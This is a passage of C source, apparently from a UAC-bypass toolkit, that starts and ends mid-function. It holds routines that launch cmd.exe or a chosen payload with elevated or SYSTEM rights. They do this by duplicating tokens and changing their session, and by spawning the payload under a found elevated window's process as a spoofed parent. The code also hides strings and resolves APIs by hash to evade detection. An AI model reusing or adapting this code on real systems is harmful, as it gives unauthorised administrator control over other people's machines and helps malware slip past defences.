if (NT_SUCCESS(status)) {
return (pebi.IsWow64Process == 1);
}
return FALSE;
}
/*
* ucmxQuerySystemDirectory
*
* Purpose:
*
* Query system directory full path including slash (with wow64 support).
*
*/
VOID ucmxQuerySystemDirectory(
_Inout_ LPWSTR lpSystemDirectory,
_In_ BOOLEAN CheckWow64)
{
WCHAR szSystem32Prep[] = { L'\\', L's', L'y', L's', 0 };
WCHAR szSystem32Final[] = { L't', L'e', L'm', L'3', L'2', L'\\', 0 };
WCHAR szWow64Final[] = { L'w', L'o', L'w', L'6', L'4', L'\\', 0 };
_strcpy(lpSystemDirectory, USER_SHARED_DATA->NtSystemRoot);
_strcat(lpSystemDirectory, szSystem32Prep);
if (CheckWow64) {
if (ucmIsProcess32bit(NtCurrentProcess())) {
_strcat(lpSystemDirectory, szWow64Final);
}
else {
_strcat(lpSystemDirectory, szSystem32Final);
}
}
else {
_strcat(lpSystemDirectory, szSystem32Final);
}
}
/*
* ucmBinTextEncode
*
* Purpose:
*
* Create pseudo random string from UI64 value.
*
*/
VOID ucmBinTextEncode(
_In_ unsigned __int64 x,
_Inout_ wchar_t* s
)
{
char tbl[64];
char c = 0;
int p;
tbl[62] = '-';
tbl[63] = '_';
for (c = 0; c < 26; ++c)
{
tbl[c] = 'A' + c;
tbl[26 + c] = 'a' + c;
if (c < 10)
tbl[52 + c] = '0' + c;
}
for (p = 0; p < 13; ++p)
{
c = x & 0x3f;
x >>= 5;
*s = (wchar_t)tbl[c];
++s;
}
*s = 0;
}
/*
* ucmGenerateSharedObjectName
*
* Purpose:
*
* Create pseudo random object name from it ID.
*
*/
VOID ucmGenerateSharedObjectName(
_In_ WORD ObjectId,
_Inout_ LPWSTR lpBuffer
)
{
ULARGE_INTEGER value;
value.LowPart = MAKELONG(
MAKEWORD(UCM_VERSION_BUILD, UCM_VERSION_REVISION),
MAKEWORD(UCM_VERSION_MINOR, UCM_VERSION_MAJOR));
value.HighPart = MAKELONG(UACME_SHARED_BASE_ID, ObjectId);
ucmBinTextEncode(value.QuadPart, lpBuffer);
}
/*
* ucmxCreateBoundaryDescriptorSID
*
* Purpose:
*
* Create special SID to access isolated namespace.
*
*/
PSID ucmxCreateBoundaryDescriptorSID(
SID_IDENTIFIER_AUTHORITY* SidAuthority,
UCHAR SubAuthorityCount,
ULONG* SubAuthorities
)
{
ULONG i;
PSID pSid;
pSid = ucmxHeapAlloc(RtlLengthRequiredSid(SubAuthorityCount));
if (pSid) {
if (NT_SUCCESS(RtlInitializeSid(pSid, SidAuthority, SubAuthorityCount))) {
for (i = 0; i < SubAuthorityCount; i++)
*RtlSubAuthoritySid(pSid, i) = SubAuthorities[i];
return pSid;
}
ucmxHeapFree(pSid);
}
return NULL;
}
/*
* ucmOpenAkagiNamespace
*
* Purpose:
*
* Open Akagi private namespace.
*
* Use NtClose on returned handle.
*
*/
HANDLE ucmOpenAkagiNamespace(
VOID
)
{
HANDLE hNamespace = NULL;
HANDLE hBoundary = NULL;
PSID pWorldSid;
SID_IDENTIFIER_AUTHORITY SidWorldAuthority = SECURITY_WORLD_SID_AUTHORITY;
UNICODE_STRING usName;
OBJECT_ATTRIBUTES obja = RTL_INIT_OBJECT_ATTRIBUTES((PUNICODE_STRING)NULL, 0);
ULONG SubAuthoritiesWorld[] = { SECURITY_WORLD_RID, 0, 0, 0, 0, 0, 0, 0 };
WCHAR szBoundaryDescriptorName[128];
RtlSecureZeroMemory(&szBoundaryDescriptorName, sizeof(szBoundaryDescriptorName));
ucmGenerateSharedObjectName((WORD)AKAGI_BDESCRIPTOR_NAME_ID, szBoundaryDescriptorName);
RtlInitUnicodeString(&usName, szBoundaryDescriptorName);
do {
//
// Create and assign boundary descriptor.
//
hBoundary = RtlCreateBoundaryDescriptor(&usName, 0);
if (hBoundary == NULL)
break;
pWorldSid = ucmxCreateBoundaryDescriptorSID(
&SidWorldAuthority,
1,
SubAuthoritiesWorld);
if (pWorldSid == NULL)
break;
if (!NT_SUCCESS(RtlAddSIDToBoundaryDescriptor(&hBoundary, pWorldSid))) {
RtlFreeSid(pWorldSid);
break;
}
if (!NT_SUCCESS(NtOpenPrivateNamespace(
&hNamespace,
MAXIMUM_ALLOWED,
&obja,
hBoundary)))
{
break;
}
} while (FALSE);
if (hBoundary) RtlDeleteBoundaryDescriptor(hBoundary);
return hNamespace;
}
/*
* ucmReadSharedParameters
*
* Purpose:
*
* Read shared parameters from Akagi.
*
* Return TRUE on success, FALSE otherwise.
*
*/
_Success_(return == TRUE)
BOOL ucmReadSharedParameters(
_Out_ UACME_PARAM_BLOCK * SharedParameters
)
{
BOOL bResult = FALSE;
ULONG Crc32;
HANDLE hNamespace = NULL, hSection = NULL;
PVOID SectionBuffer = NULL;
SIZE_T ViewSize = PAGE_SIZE;
UNICODE_STRING usName;
OBJECT_ATTRIBUTES obja;
UACME_PARAM_BLOCK sharedParameters;
WCHAR szSectionName[128];
do {
hNamespace = ucmOpenAkagiNamespace();
if (hNamespace == NULL)
break;
RtlSecureZeroMemory(&szSectionName, sizeof(szSectionName));
ucmGenerateSharedObjectName((WORD)AKAGI_SHARED_SECTION_ID, szSectionName);
RtlInitUnicodeString(&usName, szSectionName);
InitializeObjectAttributes(&obja, &usName, OBJ_CASE_INSENSITIVE, hNamespace, NULL);
if (NT_SUCCESS(NtOpenSection(&hSection, SECTION_ALL_ACCESS, &obja))) {
if (NT_SUCCESS(NtMapViewOfSection(
hSection,
NtCurrentProcess(),
&SectionBuffer,
0,
PAGE_SIZE,
NULL,
&ViewSize,
ViewUnmap,
MEM_TOP_DOWN,
PAGE_READONLY)))
{
RtlSecureZeroMemory(&sharedParameters, sizeof(UACME_PARAM_BLOCK));
RtlCopyMemory(&sharedParameters, SectionBuffer, sizeof(UACME_PARAM_BLOCK));
NtUnmapViewOfSection(NtCurrentProcess(), hSection);
//
// Validate data.
//
Crc32 = sharedParameters.Crc32;
sharedParameters.Crc32 = 0;
if (Crc32 == RtlComputeCrc32(0, &sharedParameters, sizeof(UACME_PARAM_BLOCK))) {
sharedParameters.Crc32 = Crc32;
RtlCopyMemory(SharedParameters, &sharedParameters, sizeof(UACME_PARAM_BLOCK));
bResult = TRUE;
}
}
NtClose(hSection);
}
NtClose(hNamespace);
} while (FALSE);
return bResult;
}
/*
* ucmSetCompletion
*
* Purpose:
*
* Notify Akagi about task completion.
*
*/
VOID ucmSetCompletion(
_In_ LPWSTR lpEvent
)
{
HANDLE hEvent = NULL, hNamespace = NULL;
UNICODE_STRING usName;
OBJECT_ATTRIBUTES obja;
hNamespace = ucmOpenAkagiNamespace();
if (hNamespace) {
RtlInitUnicodeString(&usName, lpEvent);
InitializeObjectAttributes(&obja, &usName, OBJ_CASE_INSENSITIVE, hNamespace, NULL);
if (NT_SUCCESS(NtOpenEvent(&hEvent, EVENT_ALL_ACCESS, &obja))) {
NtSetEvent(hEvent, NULL);
NtClose(hEvent);
}
NtClose(hNamespace);
}
}
/*
* ucmPrivilegeEnabled
*
* Purpose:
*
* Tests if the given token has the given privilege enabled/enabled by default.
*
*/
BOOLEAN ucmPrivilegeEnabled(
_In_ HANDLE hToken,
_In_ ULONG Privilege
)
{
NTSTATUS status;
PRIVILEGE_SET Privs;
BOOLEAN bResult = FALSE;
Privs.Control = PRIVILEGE_SET_ALL_NECESSARY;
Privs.PrivilegeCount = 1;
Privs.Privilege[0].Luid.LowPart = Privilege;
Privs.Privilege[0].Luid.HighPart = 0;
Privs.Privilege[0].Attributes = SE_PRIVILEGE_ENABLED_BY_DEFAULT | SE_PRIVILEGE_ENABLED;
status = NtPrivilegeCheck(hToken, &Privs, &bResult);
RtlSetLastWin32Error(RtlNtStatusToDosError(status));
return bResult;
}
/*
* ucmFormatTimeOut
*
* Purpose:
*
* Translates a Win32 style timeout to an NT relative timeout.
*
*/
PLARGE_INTEGER ucmFormatTimeOut(
_Out_ PLARGE_INTEGER TimeOut,
_In_ DWORD Milliseconds
)
{
if ((LONG)Milliseconds == -1) {
return(NULL);
}
TimeOut->QuadPart = UInt32x32To64(Milliseconds, 10000);
TimeOut->QuadPart *= -1;
return TimeOut;
}
/*
* ucmSleep
*
* Purpose:
*
* Win32 Sleep replacement.
*
*/
VOID ucmSleep(
_In_ DWORD Miliseconds
)
{
LARGE_INTEGER liDueTime;
if (Miliseconds == INFINITE) {
liDueTime.QuadPart = 0x8000000000000000;
}
else {
ucmFormatTimeOut(&liDueTime, Miliseconds);
}
NtDelayExecution(FALSE, &liDueTime);
}
/*
* ucmCreateSyncMutant
*
* Purpose:
*
* Create sync mutex.
*
*/
NTSTATUS ucmCreateSyncMutant(
_Out_ PHANDLE phMutant
)
{
UNICODE_STRING usName;
OBJECT_ATTRIBUTES obja;
WCHAR szObjectName[256];
WCHAR szName[128];
RtlSecureZeroMemory(&szName, sizeof(szName));
_strcpy(szObjectName, L"\\BaseNamedObjects\\");
ucmGenerateSharedObjectName(FUBUKI_SYNC_MUTEX_ID, szName);
_strcat(szObjectName, szName);
RtlInitUnicodeString(&usName, szObjectName);
InitializeObjectAttributes(&obja, &usName, OBJ_CASE_INSENSITIVE, NULL, NULL);
return NtCreateMutant(phMutant, MUTANT_ALL_ACCESS, &obja, FALSE);
}
/*
* ucmGetHashForString
*
* Purpose:
*
* Calculates specific hash for string.
*
*/
DWORD ucmGetHashForString(
_In_ char* s
)
{
DWORD h = 0;
while (*s != 0) {
h ^= *s;
h = RotateLeft32(h, 3) + 1;
s++;
}
return h;
}
/*
* ucmGetProcedureAddressByHash
*
* Purpose:
*
* Return pointer to function in dll from name hash value.
*
*/
LPVOID ucmGetProcedureAddressByHash(
_In_ PVOID ImageBase,
_In_ DWORD ProcedureHash
)
{
DWORD i;
ULONG sz = 0;
IMAGE_DOS_HEADER* DosHeader;
IMAGE_EXPORT_DIRECTORY* Exports;
PDWORD Names, Functions;
PWORD Ordinals;
DWORD_PTR FunctionPtr;
DosHeader = (IMAGE_DOS_HEADER*)ImageBase;
Exports = (IMAGE_EXPORT_DIRECTORY*)RtlImageDirectoryEntryToData(ImageBase,
TRUE,
IMAGE_DIRECTORY_ENTRY_EXPORT,
&sz);
if (Exports == NULL)
return NULL;
Names = (PDWORD)((PBYTE)DosHeader + Exports->AddressOfNames);
Ordinals = (PWORD)((PBYTE)DosHeader + Exports->AddressOfNameOrdinals);
Functions = (PDWORD)((PBYTE)DosHeader + Exports->AddressOfFunctions);
for (i = 0; i < Exports->NumberOfNames; i++) {
if (ucmGetHashForString((char*)((PBYTE)DosHeader + Names[i])) == ProcedureHash) {
FunctionPtr = Functions[Ordinals[i]];
return (PBYTE)ImageBase + FunctionPtr;
}
}
return NULL;
}
/*
* ucmGetStartupInfo
*
* Purpose:
*
* Reimplemented GetStartupInfoW.
*
*/
VOID ucmGetStartupInfo(
_In_ LPSTARTUPINFOW lpStartupInfo
)
{
PRTL_USER_PROCESS_PARAMETERS ProcessParameters;
if (lpStartupInfo == NULL) {
return;
}
ProcessParameters = NtCurrentPeb()->ProcessParameters;
lpStartupInfo->cb = sizeof(*lpStartupInfo);
lpStartupInfo->lpReserved = (LPWSTR)ProcessParameters->ShellInfo.Buffer;
lpStartupInfo->lpDesktop = (LPWSTR)ProcessParameters->DesktopInfo.Buffer;
lpStartupInfo->lpTitle = (LPWSTR)ProcessParameters->WindowTitle.Buffer;
lpStartupInfo->dwX = ProcessParameters->StartingX;
lpStartupInfo->dwY = ProcessParameters->StartingY;
lpStartupInfo->dwXSize = ProcessParameters->CountX;
lpStartupInfo->dwYSize = ProcessParameters->CountY;
lpStartupInfo->dwXCountChars = ProcessParameters->CountCharsX;
lpStartupInfo->dwYCountChars = ProcessParameters->CountCharsY;
lpStartupInfo->dwFillAttribute = ProcessParameters->FillAttribute;
lpStartupInfo->dwFlags = ProcessParameters->WindowFlags;
lpStartupInfo->wShowWindow = (WORD)ProcessParameters->ShowWindowFlags;
lpStartupInfo->cbReserved2 = ProcessParameters->RuntimeData.Length;
lpStartupInfo->lpReserved2 = (LPBYTE)ProcessParameters->RuntimeData.Buffer;
if (lpStartupInfo->dwFlags & (STARTF_USESTDHANDLES | STARTF_USEHOTKEY)) {
lpStartupInfo->hStdInput = ProcessParameters->StandardInput;
lpStartupInfo->hStdOutput = ProcessParameters->StandardOutput;
lpStartupInfo->hStdError = ProcessParameters->StandardError;
}
}
/*
* ucmExpandEnvironmentStrings
*
* Purpose:
*
* Reimplemented ExpandEnvironmentStrings.
*
*/
DWORD ucmExpandEnvironmentStrings(
_In_ LPCWSTR lpSrc,
_Out_writes_to_opt_(nSize, return) LPWSTR lpDst,
_In_ DWORD nSize
)
{
NTSTATUS Status;
SIZE_T SrcLength = 0, ReturnLength = 0, DstLength = (SIZE_T)nSize;
if (lpSrc) {
SrcLength = _strlen(lpSrc);
}
Status = RtlExpandEnvironmentStrings(
NULL,
(PWSTR)lpSrc,
SrcLength,
(PWSTR)lpDst,
DstLength,
&ReturnLength);
if ((NT_SUCCESS(Status)) || (Status == STATUS_BUFFER_TOO_SMALL)) {
if (ReturnLength <= MAXDWORD32)
return (DWORD)ReturnLength;
Status = STATUS_UNSUCCESSFUL;
}
RtlSetLastWin32Error(RtlNtStatusToDosError(Status));
return 0;
}
#define SI_MAX_BUFFER_LENGTH (512 * 1024 * 1024)
/*
* ucmGetSystemInfo
*
* Purpose:
*
* Returns buffer with system information by given InfoClass.
*
* Returned buffer must be freed with HeapFree after usage.
*
*/
PVOID ucmGetSystemInfo(
_In_ SYSTEM_INFORMATION_CLASS SystemInformationClass
)
{
PVOID buffer = NULL;
ULONG bufferSize = PAGE_SIZE;
NTSTATUS ntStatus;
ULONG returnedLength = 0;
buffer = ucmxHeapAlloc((SIZE_T)bufferSize);
if (buffer == NULL)
return NULL;
while ((ntStatus = NtQuerySystemInformation(
SystemInformationClass,
buffer,
bufferSize,
&returnedLength)) == STATUS_INFO_LENGTH_MISMATCH)
{
ucmxHeapFree(buffer);
bufferSize *= 2;
if (bufferSize > SI_MAX_BUFFER_LENGTH)
return NULL;
buffer = ucmxHeapAlloc((SIZE_T)bufferSize);
if (buffer == NULL)
return NULL;
}
if (NT_SUCCESS(ntStatus)) {
return buffer;
}
if (buffer)
ucmxHeapFree(buffer);
return NULL;
}
/*
* ucmLaunchPayload
*
* Purpose:
*
* Run payload (by default cmd.exe from system32)
*
*/
BOOL ucmLaunchPayload(
_In_opt_ LPWSTR pszPayload,
_In_opt_ DWORD cbPayload)
{
BOOL bResult = FALSE, bCommandLineAllocated = FALSE;
WCHAR cmdbuf[MAX_PATH * 2]; //complete process command line
WCHAR sysdir[MAX_PATH + 1]; //process working directory
STARTUPINFO startupInfo;
PROCESS_INFORMATION processInfo;
DWORD dwCreationFlags = CREATE_NEW_CONSOLE;
LPWSTR lpApplicationName = NULL, lpCommandLine = NULL;
SIZE_T memIO;
//
// Query working directory.
//
RtlSecureZeroMemory(sysdir, sizeof(sysdir));
ucmxQuerySystemDirectory(sysdir, TRUE);
//
// Query startup info from parent.
//
RtlSecureZeroMemory(&startupInfo, sizeof(startupInfo));
startupInfo.cb = sizeof(startupInfo);
ucmGetStartupInfo(&startupInfo);
//
// Determine what we want to execute, custom parameter or default cmd.exe
//
if (pszPayload && cbPayload) {
//
// We can use custom payload, copy it to internal buffer.
//
memIO = PAGE_SIZE + (SIZE_T)cbPayload;
lpCommandLine = (LPWSTR)ucmxHeapAlloc(memIO);
if (lpCommandLine) {
dwCreationFlags = 0;
bCommandLineAllocated = TRUE;
RtlCopyMemory(lpCommandLine,
pszPayload,
cbPayload);
}
}
else {
//
// Default cmd.exe should be started.
//
RtlSecureZeroMemory(cmdbuf, sizeof(cmdbuf));
_strcpy(cmdbuf, sysdir);
_strcat(cmdbuf, L"cmd.exe");
lpApplicationName = cmdbuf;
lpCommandLine = NULL;
bCommandLineAllocated = FALSE;
}
startupInfo.dwFlags = STARTF_USESHOWWINDOW;
startupInfo.wShowWindow = SW_SHOW;
RtlSecureZeroMemory(&processInfo, sizeof(processInfo));
#ifdef _TRACE_CALL
OutputDebugString(L"CreateProcessAsUser\r\n");
#endif
//
// Launch payload.
//
bResult = CreateProcessAsUser(NULL,
lpApplicationName,
lpCommandLine,
NULL,
NULL,
FALSE,
dwCreationFlags,
NULL,
sysdir,
&startupInfo,
&processInfo);
if (bResult) {
//
// We don't need these handles, close them.
//
NtClose(processInfo.hProcess);
NtClose(processInfo.hThread);
}
//
// Post execution cleanup if required.
//
if (bCommandLineAllocated)
ucmxHeapFree(lpCommandLine);
return bResult;
}
/*
* ucmLaunchPayloadEx
*
* Purpose:
*
* Run payload (by default cmd.exe from system32)
*
*/
BOOL ucmLaunchPayloadEx(
_In_ PFNCREATEPROCESSW pCreateProcess,
_In_opt_ LPWSTR pszPayload,
_In_opt_ DWORD cbPayload)
{
BOOL bResult = FALSE, bCommandLineAllocated = FALSE;
WCHAR cmdbuf[MAX_PATH * 2]; //complete process command line
WCHAR sysdir[MAX_PATH + 1]; //process working directory
STARTUPINFO startupInfo;
PROCESS_INFORMATION processInfo;
DWORD dwCreationFlags = CREATE_NEW_CONSOLE;
LPWSTR lpApplicationName = NULL, lpCommandLine = NULL;
SIZE_T memIO;
if (pCreateProcess == NULL)
return bResult;
//
// Query working directory.
//
RtlSecureZeroMemory(sysdir, sizeof(sysdir));
ucmxQuerySystemDirectory(sysdir, TRUE);
//
// Query startup info from parent.
//
RtlSecureZeroMemory(&startupInfo, sizeof(startupInfo));
startupInfo.cb = sizeof(startupInfo);
ucmGetStartupInfo(&startupInfo);
//
// Determine what we want to execute, custom parameter or default cmd.exe
//
if (pszPayload && cbPayload) {
//
// We can use custom payload, copy it to internal buffer.
//
memIO = PAGE_SIZE + (SIZE_T)cbPayload;
lpCommandLine = (LPWSTR)ucmxHeapAlloc(memIO);
if (lpCommandLine) {
dwCreationFlags = 0;
bCommandLineAllocated = TRUE;
RtlCopyMemory(lpCommandLine,
pszPayload,
cbPayload);
}
}
else {
//
// Default cmd.exe should be started.
//
RtlSecureZeroMemory(cmdbuf, sizeof(cmdbuf));
_strcpy(cmdbuf, sysdir);
_strcat(cmdbuf, L"cmd.exe");
lpApplicationName = cmdbuf;
lpCommandLine = NULL;
bCommandLineAllocated = FALSE;
}
startupInfo.dwFlags = STARTF_USESHOWWINDOW;
startupInfo.wShowWindow = SW_SHOW;
RtlSecureZeroMemory(&processInfo, sizeof(processInfo));
//
// Launch payload.
//
bResult = pCreateProcess(
lpApplicationName,
lpCommandLine,
NULL,
NULL,
FALSE,
dwCreationFlags,
NULL,
sysdir,
&startupInfo,
&processInfo);
if (bResult) {
//
// We don't need these handles, close them.
//
NtClose(processInfo.hProcess);
NtClose(processInfo.hThread);
}
//
// Post execution cleanup if required.
//
if (bCommandLineAllocated)
ucmxHeapFree(lpCommandLine);
return bResult;
}
/*
* ucmLaunchPayload2
*
* Purpose:
*
* Run payload (by default cmd.exe from system32)
*
*/
BOOL ucmLaunchPayload2(
_In_ PFNCREATEPROCESSASUSERW pCreateProcessAsUser,
_In_ BOOL bIsLocalSystem,
_In_ ULONG SessionId,
_In_opt_ LPWSTR pszPayload,
_In_opt_ DWORD cbPayload)
{
BOOL bResult = FALSE, bCommandLineAllocated = FALSE, bSrvExec = FALSE;
WCHAR cmdbuf[MAX_PATH * 2]; //complete process command line
WCHAR sysdir[MAX_PATH + 1]; //process working directory
STARTUPINFO startupInfo;
PROCESS_INFORMATION processInfo;
DWORD dwCreationFlags = CREATE_NEW_CONSOLE;
LPWSTR lpApplicationName = NULL, lpCommandLine = NULL;
SIZE_T memIO;
NTSTATUS status;
HANDLE hToken = NULL, hDupToken = NULL;
SECURITY_QUALITY_OF_SERVICE sqos;
OBJECT_ATTRIBUTES obja;
ULONG CurrentSessionId = NtCurrentPeb()->SessionId;
#ifdef _TRACE_CALL
WCHAR szDebugBuf[1000];
#endif //_TRACE_CALL
do {
bSrvExec = ((bIsLocalSystem) && (CurrentSessionId != SessionId));
#ifdef _TRACE_CALL
if (bSrvExec)
OutputDebugString(L"bServExec");
#endif //_TRACE_CALL
//
// In case of service start, prepare token for CreateProcessAsUser.
// Set token session id, to do this we need SE_TCB_PRIVILEGE, check it enabled.
//
if (bSrvExec) {
status = NtOpenProcessToken(
NtCurrentProcess(),
TOKEN_ALL_ACCESS,
&hToken);
if (!NT_SUCCESS(status)) {
#ifdef _TRACE_CALL
_strcpy(szDebugBuf, L"NtOpenProcessToken = 0x");
ultohex(status, _strend(szDebugBuf));
_strcat(szDebugBuf, L"\r\n");
OutputDebugString(szDebugBuf);
#endif //_TRACE_CALL
break;
}
#ifdef _TRACE_CALL
if (!ucmPrivilegeEnabled(hToken, SE_ASSIGNPRIMARYTOKEN_PRIVILEGE)) {
OutputDebugString(L"ucmPrivilegeEnabled->SE_ASSIGNPRIMARYTOKEN_PRIVILEGE not set\r\n");
}
#endif //_TRACE_CALL
if (!ucmPrivilegeEnabled(hToken, SE_TCB_PRIVILEGE)) {
#ifdef _TRACE_CALL
OutputDebugString(L"ucmPrivilegeEnabled->SE_TCB_PRIVILEGE not set\r\n");
#endif //_TRACE_CALL
break;
}
sqos.Length = sizeof(SECURITY_QUALITY_OF_SERVICE);
sqos.ImpersonationLevel = SecurityImpersonation;
sqos.ContextTrackingMode = 0;
sqos.EffectiveOnly = FALSE;
InitializeObjectAttributes(&obja, NULL, 0, NULL, NULL);
obja.SecurityQualityOfService = &sqos;
status = NtDuplicateToken(
hToken,
TOKEN_ALL_ACCESS,
&obja,
FALSE,
TokenPrimary,
&hDupToken);
if (!NT_SUCCESS(status)) {
#ifdef _TRACE_CALL
_strcpy(szDebugBuf, L"NtDuplicateToken = 0x");
ultohex(status, _strend(szDebugBuf));
_strcat(szDebugBuf, L"\r\n");
OutputDebugString(szDebugBuf);
#endif //_TRACE_CALL
break;
}
status = NtSetInformationToken(
hDupToken,
TokenSessionId,
(PVOID)&SessionId,
sizeof(ULONG));
if (!NT_SUCCESS(status)) {
#ifdef _TRACE_CALL
_strcpy(szDebugBuf, L"NtSetInformationToken = 0x");
ultohex(status, _strend(szDebugBuf));
_strcat(szDebugBuf, L"\r\n");
OutputDebugString(szDebugBuf);
#endif //_TRACE_CALL
break;
}
}
else {
//
// Not a service start, use default token value.
//
hDupToken = NULL;
}
//
// Query working directory.
//
RtlSecureZeroMemory(sysdir, sizeof(sysdir));
ucmxQuerySystemDirectory(sysdir, FALSE);
#ifdef _TRACE_CALL
OutputDebugString(sysdir);
#endif //_TRACE_CALL
//
// Query startup info from parent.
//
RtlSecureZeroMemory(&startupInfo, sizeof(startupInfo));
startupInfo.cb = sizeof(startupInfo);
ucmGetStartupInfo(&startupInfo);
//
// Determine what we want to execute, custom parameter or default cmd.exe
//
if (pszPayload && cbPayload) {
//
// We can use custom payload, copy it to internal buffer.
//
memIO = PAGE_SIZE + (SIZE_T)cbPayload;
lpCommandLine = (LPWSTR)ucmxHeapAlloc(memIO);
if (lpCommandLine) {
dwCreationFlags = 0;
bCommandLineAllocated = TRUE;
RtlCopyMemory(lpCommandLine,
pszPayload,
cbPayload);
}
}
else {
//
// Default cmd.exe should be started.
//
RtlSecureZeroMemory(cmdbuf, sizeof(cmdbuf));
_strcpy(cmdbuf, sysdir);
_strcat(cmdbuf, L"cmd.exe");
lpApplicationName = cmdbuf;
lpCommandLine = NULL;
bCommandLineAllocated = FALSE;
}
startupInfo.dwFlags = STARTF_USESHOWWINDOW;
startupInfo.wShowWindow = SW_SHOW;
RtlSecureZeroMemory(&processInfo, sizeof(processInfo));
//
// In case of start from service, force default WinStation and Desktop.
//
// Future note: maybe moved to registry settings as custom winsta param.
//
if (bSrvExec) {
startupInfo.lpDesktop = TEXT("Winsta0\\Default");
}
//
// Launch payload.
//
bResult = pCreateProcessAsUser(
hDupToken,
lpApplicationName,
lpCommandLine,
NULL,
NULL,
FALSE,
dwCreationFlags,
NULL,
sysdir,
&startupInfo,
&processInfo);
if (bResult) {
#ifdef _TRACE_CALL
OutputDebugString(L"CreateProcessAsUser success\r\n");
#endif //_TRACE_CALL
//
// We don't need these handles, close them.
//
NtClose(processInfo.hProcess);
NtClose(processInfo.hThread);
}
#ifdef _TRACE_CALL
else {
_strcpy(szDebugBuf, L"CreateProcessAsUser failed with code = 0x");
ultohex(GetLastError(), _strend(szDebugBuf));
_strcat(szDebugBuf, L"\r\n");
OutputDebugString(szDebugBuf);
}
#endif //_TRACE_CALL
} while (FALSE);
//
// Post execution cleanup if required.
//
if (bCommandLineAllocated)
ucmxHeapFree(lpCommandLine);
if (bSrvExec) {
if (hToken)
NtClose(hToken);
if (hDupToken)
NtClose(hDupToken);
}
return bResult;
}
/*
* ucmLaunchPayload3
*
* Purpose:
*
* Run payload (by default cmd.exe from system32)
*
*/
BOOL ucmLaunchPayload3(
_In_opt_ LPWSTR pszPayload,
_In_opt_ DWORD cbPayload)
{
BOOL bResult = FALSE, bCommandLineAllocated = FALSE;
ULONG i;
HWND hwnd;
HANDLE hProcess;
LPWSTR lpCommandLine = NULL;
SIZE_T memIO;
OPLOCK_FILE_CONTEXT ofc;
PROCESS_INFORMATION pi;
WCHAR cmdbuf[MAX_PATH * 2]; //complete process command line
WCHAR sysdir[MAX_PATH + 1]; //process working directory
if (ucmCheckUIAccessPermissions()) {
//
// Determine what we want to execute, custom parameter or default cmd.exe
//
if (pszPayload && cbPayload) {
//
// We can use custom payload, copy it to internal buffer.
//
memIO = PAGE_SIZE + (SIZE_T)cbPayload;
lpCommandLine = (LPWSTR)ucmxHeapAlloc(memIO);
if (lpCommandLine) {
bCommandLineAllocated = TRUE;
RtlCopyMemory(lpCommandLine,
pszPayload,
cbPayload);
}
}
else {
//
// Default cmd.exe should be started.
//
RtlSecureZeroMemory(cmdbuf, sizeof(cmdbuf));
//
// Query working directory.
//
RtlSecureZeroMemory(sysdir, sizeof(sysdir));
ucmxQuerySystemDirectory(sysdir, FALSE);
_strcpy(cmdbuf, sysdir);
_strcat(cmdbuf, L"cmd.exe");
lpCommandLine = cmdbuf;
bCommandLineAllocated = FALSE;
}
RtlSecureZeroMemory(&ofc, sizeof(ofc));
ofc.Length = sizeof(ofc);
ofc.FileHandle = INVALID_HANDLE_VALUE;
hwnd = ucmFindFirstElevatedWindow();
if (!hwnd) {
if (ucmStartBackupLockedElevatedProcess(&ofc)) {
for (i = 0; i < 5000; i += 500) {
ucmSleep(500);
hwnd = ucmFindFirstElevatedWindow();
}
}
}
if (hwnd)
{
RtlSecureZeroMemory(&pi, sizeof(pi));
hProcess = ucmGetHwndFullProcessHandle(hwnd);
if (hProcess)
{
bResult = ucmCreateProcessWithParent(lpCommandLine, hProcess, CREATE_NEW_CONSOLE, SW_SHOW, &pi);
if (bResult) {
CloseHandle(pi.hThread);
CloseHandle(pi.hProcess);
}
CloseHandle(hProcess);
}
}
if (ofc.FileHandle != INVALID_HANDLE_VALUE) {
ucmReleaseOpLock(&ofc);
}
}
//
// Post execution cleanup if required.
//
if (bCommandLineAllocated)
ucmxHeapFree(lpCommandLine);
return bResult;
}
/*
* ucmQueryRuntimeInfo
*
* Purpose:
*
* Output current process runtime information.
*
*/
LPWSTR ucmQueryRuntimeInfo(
_In_ BOOL ReturnData)
{
BOOL bFound = FALSE;
NTSTATUS status;
DWORD dwIntegrityLevel;
ULONG LengthNeeded = 0;
ULONG SessionId = NtCurrentPeb()->SessionId;
HANDLE hToken = NULL;
PTOKEN_MANDATORY_LABEL pTIL = NULL;
TOKEN_USER* ptu = NULL;
PROCESS_BASIC_INFORMATION pbi;
PROCESS_EXTENDED_BASIC_INFORMATION pebi;
PSYSTEM_PROCESS_INFORMATION ProcessList, pList;
LSA_OBJECT_ATTRIBUTES lobja;
LSA_HANDLE PolicyHandle = NULL;
PLSA_REFERENCED_DOMAIN_LIST ReferencedDomains = NULL;
PLSA_TRANSLATED_NAME Names = NULL;
SECURITY_QUALITY_OF_SERVICE SecurityQualityOfService;
LPWSTR lpReport, lpValue = TEXT("Unknown");
WCHAR szBuffer[MAX_PATH + 1];
RtlSecureZeroMemory(&szBuffer, sizeof(szBuffer));
if (GetModuleFileName(NULL, (LPWSTR)&szBuffer, MAX_PATH) == 0)
return NULL;
lpReport = (LPWSTR)ucmxHeapAlloc(2 * PAGE_SIZE);
if (lpReport == NULL)
return NULL;
//
// 1. Attach module name.
//
_strncpy(lpReport, MAX_PATH, szBuffer, MAX_PATH);
//
// 2. Inherited from.
//
RtlSecureZeroMemory(&pbi, sizeof(PROCESS_BASIC_INFORMATION));
status = NtQueryInformationProcess(
NtCurrentProcess(),
ProcessBasicInformation,
&pbi,
sizeof(PROCESS_BASIC_INFORMATION),
&LengthNeeded);
if (NT_SUCCESS(status)) {
_strcpy(szBuffer, TEXT("\r\nInherited from PID="));
#ifdef _WIN64
u64tostr(pbi.InheritedFromUniqueProcessId, _strend(szBuffer));
#else
ultostr((ULONG)pbi.InheritedFromUniqueProcessId, _strend(szBuffer));
#endif
_strcat(lpReport, szBuffer);
_strcat(lpReport, TEXT(" ("));
RtlSecureZeroMemory(szBuffer, sizeof(szBuffer));
bFound = FALSE;
ProcessList = (PSYSTEM_PROCESS_INFORMATION)ucmGetSystemInfo(SystemProcessInformation);
if (ProcessList) {
pList = ProcessList;
for (;;) {
if ((ULONG_PTR)pList->UniqueProcessId == pbi.InheritedFromUniqueProcessId) {
_strncpy(szBuffer,
MAX_PATH,
pList->ImageName.Buffer,
pList->ImageName.Length / sizeof(WCHAR));
bFound = TRUE;
break;
}
if (pList->NextEntryDelta == 0) {
break;
}
pList = (PSYSTEM_PROCESS_INFORMATION)(((LPBYTE)pList) + pList->NextEntryDelta);
}
ucmxHeapFree(ProcessList);
}
if (bFound) {
_strcat(lpReport, szBuffer);
}
else {
